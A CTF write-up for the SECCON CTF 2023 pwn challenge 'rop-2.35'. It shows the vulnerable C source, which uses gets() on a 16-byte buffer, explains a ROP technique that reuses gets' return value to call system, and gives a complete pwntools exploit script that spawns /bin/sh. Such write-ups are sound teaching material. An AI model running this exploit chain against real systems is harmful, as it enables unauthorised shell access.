
SECCON CTF 2023 - [pwn] rop-2.35

#include <stdio.h>
#include <stdlib.h>

/*
 * Challenge binary: prompts via system() and then reads a line into a
 * 16-byte stack buffer with gets(), which performs no length check, so any
 * line longer than the buffer runs past it into the saved frame — this is
 * the stack overflow the write-up exploits.  gets() was removed from the C
 * standard in C11; the fix is a bounded read such as
 * fgets(buf, sizeof buf, stdin).  `void main()` is also non-standard
 * (should be `int main(void)`).
 */
void main() {
  char buf[0x10];                   /* 16 bytes of stack, no terminator reserved */
  system("echo Enter something:");  /* also links system() into the binary, which the ROP chain reuses */
  gets(buf);                        /* unbounded read: the overflow */
}

There is an obvious stack overflow.

Exploitation

The gadgets in the binary are limited, so we use
the return value (rax) of gets, which is buf,
together with this gadget:

.text:0000000000401169                 mov     rdi, rax
.text:000000000040116C                 call    _system

to set rdi to buf, into which we can write /bin/sh.

We also need to pad our chain with 2 ret gadgets to keep the stack 16-byte aligned;
otherwise system will crash on a movaps instruction.

#!/bin/env python3

from pwn import *

# Target binary; handing it to context.binary lets pwntools derive arch/bits from it.
elf = ELF("./chall")
context.binary = elf
# Set explicitly as well so p64() packs 64-bit little-endian values.
context.arch = 'amd64'
# Debug sessions (args.GDB) open in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# Tube to the target; filled in once start() has run.
io = None

def convert(x):
    """Return *x* as bytes: bytes pass through, anything else is str()-encoded."""
    if type(x) is bytes:
        return x
    return str(x).encode()


def s(data):
    """Send *data* (converted to bytes) to the target."""
    return io.send(convert(data))


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(convert(data))


def sla(delim, data):
    """Wait for *delim*, then send *data* plus newline, bounded by context.timeout."""
    return io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)


def ru(delims, drop=True):
    """Receive up to *delims* (dropped from the result by default), bounded by context.timeout."""
    return io.recvuntil(delims, drop, timeout=context.timeout)


def r(n):
    """Receive up to *n* bytes."""
    return io.recv(n)


def rl():
    """Receive one line."""
    return io.recvline()


# Remote endpoint for args.REMOTE runs (a placeholder address in this write-up).
HOST = '10.10.10.10'
PORT = 1337

# Commands for args.GDB runs: stay on the parent across system()'s fork, set two
# breakpoints inside main (the offsets are specific to this build), then continue.
gdbscript = "\n".join([
    "",
    "set follow-fork-mode parent",
    "br *main+46",
    "br *main+39",
    "c",
    "",
])

def start():
    """Return a tube to the target, chosen by the script's command-line flags.

    GDB takes precedence over REMOTE; with neither set, a plain local
    process is spawned.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gdbscript)
    if args.REMOTE:
        return remote(HOST, PORT)
    return process(elf.path)

io = start()

# Fixed addresses: the .text listing above places the gadget at 0x401169,
# so the binary is loaded at a constant base and nothing needs to be leaked.
ret = 0x40101a            # bare `ret`; two copies shift rsp by 16 so system() sees an aligned stack
mov_rdi_rax = 0x401169    # mov rdi, rax ; call _system — rax still holds buf after gets()

# 24 bytes of "/bin/sh\0" copies fill buf (16 bytes) and presumably the saved
# rbp, then the return address is overwritten by the chain.  Because rax == buf,
# the gadget hands the start of this same string to system().
padding = b"/bin/sh\x00" * 3
chain = p64(ret) * 2 + p64(mov_rdi_rax)
payload = padding + chain
sl(payload)
io.interactive()